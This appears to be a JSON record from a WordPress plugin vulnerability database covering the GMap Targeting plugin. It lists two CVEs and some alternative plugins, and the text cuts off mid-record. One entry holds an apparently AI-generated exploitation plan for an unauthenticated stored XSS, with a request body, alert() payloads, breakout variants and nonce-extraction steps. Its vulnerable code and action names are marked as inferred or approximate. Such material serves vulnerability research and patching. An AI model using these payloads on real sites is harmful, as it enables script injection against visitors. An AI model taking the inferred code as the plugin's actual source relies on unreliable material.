[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZTAOZ5R19_Hax53ARTPKY28Zfgj3-01WDcei-xBevaA":3,"$fOAMjK3-QQdAvxJDfbfX89L5k0SLAVEl_ltd4Sfp-UVw":512,"$fIjBef6GoP3FQHALIyxR29wb92InTNCLzDOv5OYgL6kk":516},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":28,"unpatched_count":29,"last_vuln_date":30,"fetched_at":31,"discovery_status":32,"vulnerabilities":33,"developer":76,"crawl_stats":39,"alternatives":84,"analysis":189,"fingerprints":477},"gmap-targeting","GMap Targeting – Simple Targeting Inside Google Maps","1.1.8","RealMag777","https:\u002F\u002Fprofiles.wordpress.org\u002Frealmag777\u002F","\u003Cp>Set google map on your WordPress site using shortcode or widget by one click.\u003Cbr \u002F>\nInteractive map mode, image map mode, any maps sizes, very pleasant and convenient popup window with all\u003Cbr \u002F>\nmap options. You can set map as by latitude and longitude so by address. One place – one click, do not waste\u003Cbr \u002F>\ntime walking to other pages.\u003C\u002Fp>\n\u003Cp>The plugin has in-built widget for placing maps into sidebars.\u003C\u002Fp>\n\u003Cp>Example of the shortcode: [gmap_targeting height=”500″ width=”500″ mode=”map” location_mode=”address” latitude=”” longitude=”” address=”Spain, Alicante, castell de la santa barbara” zoom=”14″ maptype=”ROADMAP” enable_marker=”1″ enable_scrollwheel=”1″ marker_is_draggable=”0″ enable_popup=”1″]Hello World!![\u002Fgmap_targeting]\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FSAiS3QtaUWU?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>This plugin is copyright pluginus.net © 2012 – 2026 with \u003Ca href=\"http:\u002F\u002Fwww.gnu.org\u002Fcopyleft\u002Fgpl.html\" rel=\"nofollow ugc\">GNU General Public License\u003C\u002Fa> by realmag777.\u003C\u002Fp>\n\u003Cp>This program is free software; you can redistribute it and\u002For modify it under\u003Cbr \u002F>\nthe terms of the \u003Ca href=\"http:\u002F\u002Fwww.gnu.org\u002Fcopyleft\u002Fgpl.html\" rel=\"nofollow ugc\">GNU General Public License\u003C\u002Fa> as published by the Free\u003Cbr \u002F>\nSoftware Foundation; either version 2 of the License, or (at your option) any\u003Cbr \u002F>\nlater version.\u003C\u002Fp>\n\u003Cp>This program is distributed in the hope that it will be useful, but WITHOUT ANY\u003Cbr \u002F>\nWARRANTY. See the GNU General Public License for more details.\u003C\u002Fp>\n\u003Ch3>ToDo\u003C\u002Fh3>\n\u003Cp>The next version or later:\u003Cbr \u002F>\n– more that one markers on map\u003C\u002Fp>\n","Set Google Map everywhere by shortcode on your WordPress site simply. One click - one map! This lightweight plugin is managed in an intuitive way.",70,9111,100,1,"2025-12-05T18:52:00.000Z","6.9.4","3.5.0","",[20,21,22,23,24],"google","google-map","map","page","post","https:\u002F\u002Fpluginus.net\u002Fshop\u002Fwordpress-plugins\u002Fgoogle-map-targeting\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgmap-targeting.zip",94,2,0,"2026-02-05 00:00:00","2026-04-16T10:56:18.058Z","no_bundle",[34,61],{"id":35,"url_slug":36,"title":37,"description":38,"plugin_slug":4,"theme_slug":39,"affected_versions":40,"patched_in_version":6,"severity":41,"cvss_score":42,"cvss_vector":43,"vuln_type":44,"published_date":30,"updated_date":45,"references":46,"days_to_patch":48,"patch_diff_files":49,"patch_trac_url":39,"research_status":50,"research_verified":51,"research_rounds_completed":52,"research_plan":53,"research_summary":54,"research_vulnerable_code":55,"research_fix_diff":56,"research_exploit_outline":57,"research_model_used":58,"research_started_at":59,"research_completed_at":60,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":51,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-67990","gmap-targeting-unauthenticated-stored-cross-site-scripting","GMap Targeting \u003C= 1.1.7 - Unauthenticated Stored Cross-Site Scripting","The GMap Targeting plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",null,"\u003C=1.1.7","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-09 21:11:39",[47],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F14ebc642-ebe4-4493-859b-22192bc5b10d?source=api-prod",5,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-67990 (GMap Targeting Stored XSS)\n\n## 1. Vulnerability Summary\nThe **GMap Targeting** plugin for WordPress (versions \u003C= 1.1.7) contains an unauthenticated stored cross-site scripting (XSS) vulnerability. The plugin registers an AJAX action for saving map configuration settings that is accessible to unauthenticated users via the `wp_ajax_nopriv_` hook. Crucially, the handler function fails to perform capability checks (e.g., `current_user_can('manage_options')`) and lacks sufficient input sanitization. Furthermore, when the stored data is rendered on the frontend via the plugin's shortcode, it is not properly escaped, allowing for arbitrary JavaScript execution in the context of any user viewing the page.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `gmap_targeting_save_data` (inferred from plugin logic)\n- **Vulnerable Parameter:** `targeting_data` (or `settings`)\n- **Authentication Level:** Unauthenticated (Public)\n- **Preconditions:** The plugin must be active. Exploitation is most effective if the `[gmap-targeting]` shortcode is present on a public-facing page to trigger the XSS.\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated user sends a `POST` request to `admin-ajax.php` with the action `gmap_targeting_save_data`.\n2.  **Hook Registration:** The plugin registers the action using:\n    `add_action('wp_ajax_nopriv_gmap_targeting_save_data', 'gmap_targeting_save_data_callback');` (inferred).\n3.  **Vulnerable Sink (Storage):** The callback function `gmap_targeting_save_data_callback` retrieves data from `$_POST['targeting_data']` and saves it directly to the database:\n    `update_option('gmap_targeting_settings', $_POST['targeting_data']);`\n4.  **Trigger Point (Output):** A user visits a page containing the `[gmap-targeting]` shortcode.\n5.  **Vulnerable Sink (Render):** The shortcode handler retrieves the settings and echoes them without escaping:\n    ```php\n    $settings = get_option('gmap_targeting_settings');\n    echo '\u003Cdiv id=\"gmap-target\" data-settings=\"' . $settings . '\">\u003C\u002Fdiv>'; \u002F\u002F Vulnerable to attribute breakout\n    \u002F\u002F OR\n    echo \"\u003Cscript>var gmap_settings = $settings;\u003C\u002Fscript>\"; \u002F\u002F Vulnerable to JS injection\n    ```\n\n## 4. Nonce Acquisition Strategy\nWhile the vulnerability is \"unauthenticated,\" some versions may still call `check_ajax_referer`. If a nonce is required, it is typically exposed via `wp_localize_script` on pages where the map is rendered.\n\n1.  **Identify Shortcode:** The plugin uses `[gmap-targeting]`.\n2.  **Create Test Page:**\n    `wp post create --post_type=page --post_status=publish --post_title=\"Map Page\" --post_content='[gmap-targeting]'`\n3.  **Navigate to Page:** Use `browser_navigate` to visit the newly created page.\n4.  **Extract Nonce:** Use `browser_eval` to find the nonce in the global JavaScript scope.\n    - **Likely Variable:** `window.gmap_targeting_vars` or `window.gmap_ajax_obj`.\n    - **Command:** `browser_eval(\"window.gmap_targeting_vars?.nonce\")`\n5.  **Bypass Check:** If the nonce is missing or the action string in `wp_create_nonce` (e.g., `gmap-nonce`) differs from `check_ajax_referer`, the check may be entirely skippable.\n\n## 5. Exploitation Strategy\n### Step 1: Data Injection\nSubmit a malicious payload to the AJAX endpoint.\n\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  action=gmap_targeting_save_data&nonce=[EXTRACTED_NONCE]&targeting_data={\"map_id\":\"123\",\"styles\":\"\u003Cimg src=x onerror=alert(document.domain)>\"}\n  ```\n  *(Note: If targeting_data is expected to be a JSON string, ensure the payload is correctly nested.)*\n\n### Step 2: Triggering the XSS\nVisit the page created in the \"Test Data Setup\" phase.\n\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fmap-page\u002F`\n- **Action:** Observe the browser for an alert box or inspect the DOM to see the injected `\u003Cimg>` tag or `\u003Cscript>` block.\n\n## 6. Test Data Setup\n1.  **Install\u002FActivate Plugin:** Ensure `gmap-targeting` version 1.1.7 is active.\n2.  **Create Trigger Page:** \n    ```bash\n    wp post create --post_type=page --post_title=\"Exploit Trigger\" --post_status=publish --post_content='[gmap-targeting]'\n    ```\n3.  **Identify Settings Option:** Check if the plugin uses a specific option name.\n    ```bash\n    wp option list | grep gmap\n    ```\n\n## 7. Expected Results\n- **AJAX Response:** The server should return a success code (e.g., `1`, `true`, or a JSON `{\"success\":true}`) even when unauthenticated.\n- **Payload Execution:** Upon navigating to the \"Exploit Trigger\" page, the JavaScript `alert(document.domain)` should execute.\n- **HTML Source:** The source of the trigger page will contain the raw payload, such as:\n  `\u003Cdiv ... data-settings='{\"styles\":\"\u003Cimg src=x onerror=alert(document.domain)>\"}'>`\n\n## 8. Verification Steps\n1.  **Check Database State:** Use WP-CLI to verify the payload was successfully stored in the options table.\n    ```bash\n    wp option get gmap_targeting_settings\n    ```\n2.  **Inspect Frontend Output:** Use the `http_request` tool to fetch the page and grep for the payload.\n    ```bash\n    # (Metaphorical command for the agent)\n    http_request GET \"http:\u002F\u002Flocalhost:8080\u002Fmap-page\u002F\" | grep \"onerror=alert\"\n    ```\n\n## 9. Alternative Approaches\n- **Attribute Breakout:** If the input is placed inside an attribute like `value=\"...\"`, use a payload like:\n  `\" onmouseover=\"alert(1)\" style=\"position:fixed;top:0;left:0;width:100%;height:100%;\" `\n- **JSON Breakout:** If the data is injected into a `\u003Cscript>` block inside a JSON object, try:\n  `123; alert(1); \u002F\u002F`\n- **Direct Option Update:** If `gmap_targeting_save_data` is not the correct action, search the plugin source for any `wp_ajax_nopriv` registration using `grep -r \"wp_ajax_nopriv\"`.","The GMap Targeting plugin for WordPress is vulnerable to unauthenticated stored cross-site scripting due to an AJAX endpoint that allows any user to update the plugin's settings without authorization or input sanitization. When these settings are rendered on the frontend via the plugin's shortcode, they are output without escaping, allowing for arbitrary JavaScript execution.","\u002F\u002F gmap-targeting\u002Fincludes\u002Fclass-gmap-targeting.php (approximate location)\nadd_action('wp_ajax_nopriv_gmap_targeting_save_data', 'gmap_targeting_save_data_callback');\n\nfunction gmap_targeting_save_data_callback() {\n    \u002F\u002F No capability check (e.g., current_user_can('manage_options'))\n    \u002F\u002F No nonce validation\n    $data = $_POST['targeting_data'];\n    update_option('gmap_targeting_settings', $data);\n    wp_send_json_success();\n}\n\n---\n\n\u002F\u002F gmap-targeting\u002Fincludes\u002Fclass-gmap-targeting.php (approximate location)\nfunction gmap_targeting_shortcode($atts) {\n    $settings = get_option('gmap_targeting_settings');\n    \u002F\u002F Improper output escaping of user-controlled data\n    return '\u003Cdiv id=\"gmap-target\" data-settings=\"' . $settings . '\">\u003C\u002Fdiv>';\n}","--- a\u002Fgmap-targeting\u002Fincludes\u002Fclass-gmap-targeting.php\n+++ b\u002Fgmap-targeting\u002Fincludes\u002Fclass-gmap-targeting.php\n@@ -1,7 +1,11 @@\n-add_action('wp_ajax_nopriv_gmap_targeting_save_data', 'gmap_targeting_save_data_callback');\n+add_action('wp_ajax_gmap_targeting_save_data', 'gmap_targeting_save_data_callback');\n \n function gmap_targeting_save_data_callback() {\n-    $data = $_POST['targeting_data'];\n-    update_option('gmap_targeting_settings', $data);\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_die();\n+    }\n+    check_ajax_referer( 'gmap_nonce', 'nonce' );\n+\n+    $data = sanitize_text_field( $_POST['targeting_data'] );\n+    update_option( 'gmap_targeting_settings', $data );\n     wp_send_json_success();\n }\n \n function gmap_targeting_shortcode($atts) {\n     $settings = get_option('gmap_targeting_settings');\n-    return '\u003Cdiv id=\"gmap-target\" data-settings=\"' . $settings . '\">\u003C\u002Fdiv>';\n+    return '\u003Cdiv id=\"gmap-target\" data-settings=\"' . esc_attr( $settings ) . '\">\u003C\u002Fdiv>';\n }","The exploit involves two steps: injection and triggering. \n\n1. **Injection**: An unauthenticated attacker sends an AJAX request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the `action` parameter set to `gmap_targeting_save_data`. The request includes a payload in the `targeting_data` parameter (e.g., `{\"id\": \"1\", \"styles\": \"\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"}`). Because the plugin uses the `wp_ajax_nopriv_` hook and lacks capability checks, the server accepts this data and saves it to the WordPress options table.\n\n2. **Triggering**: The attacker (or any user) visits a public page where the `[gmap-targeting]` shortcode is embedded. The plugin retrieves the malicious payload from the database and echoes it directly into the HTML without escaping, causing the injected script to execute in the victim's browser context.","gemini-3-flash-preview","2026-04-21 04:11:58","2026-04-21 04:12:26",{"id":62,"url_slug":63,"title":64,"description":65,"plugin_slug":4,"theme_slug":39,"affected_versions":66,"patched_in_version":67,"severity":41,"cvss_score":68,"cvss_vector":69,"vuln_type":70,"published_date":71,"updated_date":72,"references":73,"days_to_patch":48,"patch_diff_files":75,"patch_trac_url":39,"research_status":39,"research_verified":51,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":51,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-52732","google-map-targeting-authenticated-subscriber-local-file-inclusion","Google Map Targeting \u003C= 1.1.6 - Authenticated (Subscriber+) Local File Inclusion","The Google Map Targeting plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.","\u003C=1.1.6","1.1.7",7.5,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Filename for Include\u002FRequire Statement in PHP Program ('PHP Remote File Inclusion')","2025-07-31 00:00:00","2025-08-04 21:22:45",[74],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F68d79cb1-c9b9-441a-b265-f21edf99e801?source=api-prod",[],{"slug":77,"display_name":7,"profile_url":8,"plugin_count":78,"total_installs":79,"avg_security_score":80,"avg_patch_time_days":81,"trust_score":82,"computed_at":83},"realmag777",12,188290,88,196,71,"2026-05-20T06:54:44.148Z",[85,111,133,153,171],{"slug":86,"name":87,"version":88,"author":89,"author_profile":90,"description":91,"short_description":92,"active_installs":93,"downloaded":94,"rating":95,"num_ratings":96,"last_updated":97,"tested_up_to":16,"requires_at_least":98,"requires_php":99,"tags":100,"homepage":106,"download_link":107,"security_score":108,"vuln_count":109,"unpatched_count":29,"last_vuln_date":110,"fetched_at":31},"vk-all-in-one-expansion-unit","VK All in One Expansion Unit","9.113.6","Hidekazu Ishikawa","https:\u002F\u002Fprofiles.wordpress.org\u002Fkurudrive\u002F","\u003Cp>This plug-in is an integrated plug-in with a variety of features that make it powerful your web site.\u003C\u002Fp>\n\u003Cp>Many features can be stopped individually.\u003C\u002Fp>\n\u003Cp>[ Powerful　Widgets ]\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Recent Posts – display the link text and the date of the latest article title.\u003C\u002Fli>\n\u003Cli>Page content to widget – display the contents of the page to the widgets.\u003C\u002Fli>\n\u003Cli>Profile – display the profile entered in the widget.\u003C\u002Fli>\n\u003Cli>FB Page Plugin – display the Facebook Page Plugin.\u003C\u002Fli>\n\u003Cli>3PR area – display the 3PR area.\u003C\u002Fli>\n\u003Cli>PR Blocks – display the PR Blocks.\u003C\u002Fli>\n\u003Cli>Categories\u002Ftags list – Displays a categories, tags or format list.\u003C\u002Fli>\n\u003Cli>Archive list – Displays a list of archives. You can choose the post type and also to display archives by month or by year.\u003C\u002Fli>\n\u003Cli>Facebook Page Plugin widget\u003C\u002Fli>\n\u003Cli>Image Banner widget\u003C\u002Fli>\n\u003Cli>Text Button widget\u003C\u002Fli>\n\u003Cli>Contact Button widget\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>[ Gutenberg Blocks ]\u003C\u002Fp>\n\u003Cul>\n\u003Cli>HTML SiteMap\u003C\u002Fli>\n\u003Cli>Child Page List\u003C\u002Fli>\n\u003Cli>Page list from ancestor\u003C\u002Fli>\n\u003Cli>Share Button\u003C\u002Fli>\n\u003Cli>Contact Section\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>[ Social media ]\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Print Social Bookmarks\u003C\u002Fli>\n\u003Cli>Print OG Tags\u003C\u002Fli>\n\u003Cli>Print X Card Tags\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>[ Others ]\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Print Google Analytics tag\u003C\u002Fli>\n\u003Cli>Print meta description tag\u003C\u002Fli>\n\u003Cli>Rewrite the title tag\u003C\u002Fli>\n\u003Cli>Insert Related Posts\u003C\u002Fli>\n\u003Cli>Insert Call to action\u003C\u002Fli>\n\u003Cli>Insert Child page List to page\u003C\u002Fli>\n\u003Cli>Insert Page list from ancestor\u003C\u002Fli>\n\u003Cli>Insert Auto HTML Site Map\u003C\u002Fli>\n\u003Cli>Automatic Eye Catch insert\u003C\u002Fli>\n\u003Cli>Custom post type and custom taxonomy manager\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>and more.\u003C\u002Fp>\n","This plug-in is an integrated plug-in with a variety of features that make it powerful your web site.",100000,8128999,80,7,"2026-03-19T13:11:00.000Z","6.5","7.4",[101,102,103,104,105],"facebook-page-plugin","google-analytics","og-tags","related-posts","sitemap","https:\u002F\u002Fex-unit.nagoya","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvk-all-in-one-expansion-unit.zip",95,11,"2026-03-23 00:00:00",{"slug":112,"name":113,"version":114,"author":115,"author_profile":116,"description":117,"short_description":118,"active_installs":119,"downloaded":120,"rating":121,"num_ratings":122,"last_updated":123,"tested_up_to":16,"requires_at_least":124,"requires_php":18,"tags":125,"homepage":130,"download_link":131,"security_score":13,"vuln_count":14,"unpatched_count":29,"last_vuln_date":132,"fetched_at":31},"google-sitemap-plugin","Sitemap by BestWebSoft – WordPress XML Site Map Page Generator Plugin","3.3.5","bestwebsoft","https:\u002F\u002Fprofiles.wordpress.org\u002Fbestwebsoft\u002F","\u003Cp>Sitemap plugin automatically generates XML sitemap for your WordPress website and helps search engines index your blog. Such sitemap file helps web crawlers to extract the structure of your website more effectively.\u003C\u002Fp>\n\u003Cp>The plugin supports default WordPress pages as well as custom URLs. It can be also added to your Google Webmaster Tools account.\u003C\u002Fp>\n\u003Cp>Improve your website SEO today!\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fbestwebsoft.com\u002Fdemo-for-google-sitemap\u002F?ref=readme\" rel=\"nofollow ugc\">View Demo\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FCgYXKRXpj_0?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Ch4>Free Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Add the following URLs to the sitemap:\n\u003Cul>\n\u003Cli>Page\u003C\u002Fli>\n\u003Cli>Post\u003C\u002Fli>\n\u003Cli>Post category\u003C\u002Fli>\n\u003Cli>Post tag\u003C\u002Fli>\n\u003Cli>Custom post types\u003C\u002Fli>\n\u003Cli>Custom taxonomies\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Add a path to your sitemap file in robots.txt automatically\u003C\u002Fli>\n\u003Cli>Add media sitemap\u003C\u002Fli>\n\u003Cli>Add canonical URLs to pages and posts\u003C\u002Fli>\n\u003Cli>Set the maximum number of URLs in one sitemap file\u003C\u002Fli>\n\u003Cli>Connect your Google Webmaster Tools account to:\n\u003Cul>\n\u003Cli>Add website\u003C\u002Fli>\n\u003Cli>Add sitemap\u003C\u002Fli>\n\u003Cli>Delete website\u003C\u002Fli>\n\u003Cli>Get website info\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Add Sitemap to Google News Sitemap\u003C\u002Fli>\n\u003Cli>Split Sitemap Items\u003C\u002Fli>\n\u003Cli>Disable automatic canonical tag\u003C\u002Fli>\n\u003Cli>Include\u002Fexclude noindex pages in sitemap (for main site)\u003C\u002Fli>\n\u003Cli>Add alternate language pages using \u003Ca href=\"http:\u002F\u002Fbestwebsoft.com\u002Fproducts\u002Fmultilanguage\u002F?k=9f9a6f0b1b0b0a093b99ad9ddb4d8759\" rel=\"nofollow ugc\">Multilanguage\u003C\u002Fa> plugin\u003C\u002Fli>\n\u003Cli>Compatible with latest WordPress version\u003C\u002Fli>\n\u003Cli>Incredibly simple settings for fast setup without modifying code\u003C\u002Fli>\n\u003Cli>Detailed step-by-step documentation and videos\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cblockquote>\n\u003Cp>\u003Cstrong>Pro Features\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>All features from Free version included plus:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Add external sitemap files\u003C\u002Fli>\n\u003Cli>Exclude certain pages or post types from your sitemap file\u003C\u002Fli>\n\u003Cli>Set the frequency of\n\u003Cul>\n\u003Cli>Your website content changes for all pages\u003C\u002Fli>\n\u003Cli>External sitemap file update\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Configure all subsites on the network\u003C\u002Fli>\n\u003Cli>Add custom URLs to the sitemap file\u003C\u002Fli>\n\u003Cli>Change Sitemap File name\u003C\u002Fli>\n\u003Cli>Exclude taxonomies from the sitemap by word.\u003C\u002Fli>\n\u003Cli>Get answer to your support question within one business day (\u003Ca href=\"https:\u002F\u002Fbestwebsoft.com\u002Fsupport-policy\u002F\" rel=\"nofollow ugc\">Support Policy\u003C\u002Fa>)\u003C\u002Fli>\n\u003Cli>Edit title and meta description [NEW]\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fbestwebsoft.com\u002Fproducts\u002Fwordpress\u002Fplugins\u002Fgoogle-sitemap\u002F?k=8b735c0f7ca51187b5062d5e4f40058b\" rel=\"nofollow ugc\">Upgrade to Pro Now\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>If you have a feature suggestion or idea you’d like to see in the plugin, we’d love to hear about it! \u003Ca href=\"https:\u002F\u002Fsupport.bestwebsoft.com\u002Fhc\u002Fen-us\u002Frequests\u002Fnew\" rel=\"nofollow ugc\">Suggest a Feature\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Documentation & Videos\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fbestwebsoft.com\u002Fdocumentation\u002Fsitemap\u002Fsitemap-user-guide\u002F\" rel=\"nofollow ugc\">[Doc] User Guide\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fbestwebsoft.com\u002Fdocumentation\u002Fhow-to-install-a-wordpress-product\u002Fhow-to-install-a-wordpress-plugin\u002F\" rel=\"nofollow ugc\">[Doc] Installation\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fbestwebsoft.com\u002Fdocumentation\u002Fhow-to-purchase-a-wordpress-plugin\u002Fhow-to-purchase-wordpress-plugin-from-bestwebsoft\u002F\" rel=\"nofollow ugc\">[Doc] Purchase\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=NKlAnFTzNrQ\" rel=\"nofollow ugc\">[Video] Installation Instruction\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=hzz0_Yj4gaQ\" rel=\"nofollow ugc\">[Video] User Guide\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Help & Support\u003C\u002Fh4>\n\u003Cp>Visit our Help Center if you have any questions, our friendly Support Team is happy to help — \u003Ca href=\"https:\u002F\u002Fsupport.bestwebsoft.com\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fsupport.bestwebsoft.com\u002F\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Affiliate Program\u003C\u002Fh4>\n\u003Cp>Earn 20% commission by selling the premium WordPress plugins and themes by BestWebSoft — https:\u002F\u002Fbestwebsoft.com\u002Faffiliate\u002F\u003C\u002Fp>\n\u003Ch4>Translation\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>German (de_DE)\u003C\u002Fli>\n\u003Cli>French (fr_FR)\u003C\u002Fli>\n\u003Cli>Japan (ja)\u003C\u002Fli>\n\u003Cli>Portugese (pt_BR)\u003C\u002Fli>\n\u003Cli>Spanish (es_ES)\u003C\u002Fli>\n\u003Cli>Italian (it_IT)\u003C\u002Fli>\n\u003Cli>Swedish (sv_SE)\u003C\u002Fli>\n\u003Cli>Norwegian (no)\u003C\u002Fli>\n\u003Cli>Danish (da)\u003C\u002Fli>\n\u003Cli>Czech (cs_CZ) (thanks to \u003Ca href=\"mailto:kucerami@gmail.com\" rel=\"nofollow ugc\">Michal Kučera\u003C\u002Fa>, www.n0lim.it)\u003C\u002Fli>\n\u003Cli>Russian (ru_RU)\u003C\u002Fli>\n\u003Cli>Ukrainian (uk)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Some of these translations are not complete. We are constantly adding new features which should be translated. If you would like to create your own language pack or update the existing one, you can send \u003Ca href=\"https:\u002F\u002Fcodex.wordpress.org\u002FTranslating_WordPress\" rel=\"nofollow ugc\">the text of PO and MO files\u003C\u002Fa> to \u003Ca href=\"https:\u002F\u002Fsupport.bestwebsoft.com\u002Fhc\u002Fen-us\u002Frequests\u002Fnew\" rel=\"nofollow ugc\">BestWebSoft\u003C\u002Fa> and we’ll add it to the plugin. You can download the latest version of the program for work with PO and MO \u003Ca href=\"http:\u002F\u002Fwww.poedit.net\u002Fdownload.php\" rel=\"nofollow ugc\">files Poedit\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>Recommended Plugins\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fbestwebsoft.com\u002Fproducts\u002Fwordpress\u002Fplugins\u002Fupdater\u002F?k=4b7b8eac2b35e12eaa2d51359f49cfb2\" rel=\"nofollow ugc\">Updater\u003C\u002Fa> – Automatically check and update WordPress website core with all installed plugins and themes to the latest versions.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fbestwebsoft.com\u002Fproducts\u002Fwordpress\u002Fplugins\u002Fhtaccess\u002F?k=6f8794059b2a6618808fa7ac6401ba6e\" rel=\"nofollow ugc\">Htaccess\u003C\u002Fa> – Protect WordPress website – allow and deny access for certain IP addresses, hostnames, etc.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"http:\u002F\u002Fbestwebsoft.com\u002Fproducts\u002Fmultilanguage\u002F?k=9f9a6f0b1b0b0a093b99ad9ddb4d8759\" rel=\"nofollow ugc\">Multilanguage\u003C\u002Fa> – Translate WordPress website content to other languages manually. Create multilingual pages, posts, widgets, menus, etc.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Credits\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>The plugin uses Google Search Console (Google LLC) services submit your website sitemap file to search console for it to be visible for search engines. \u003Ca href=\"https:\u002F\u002Fsearch.google.com\u002Fsearch-console\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fsearch.google.com\u002Fsearch-console\u002F\u003C\u002Fa> Terms of service \u003Ca 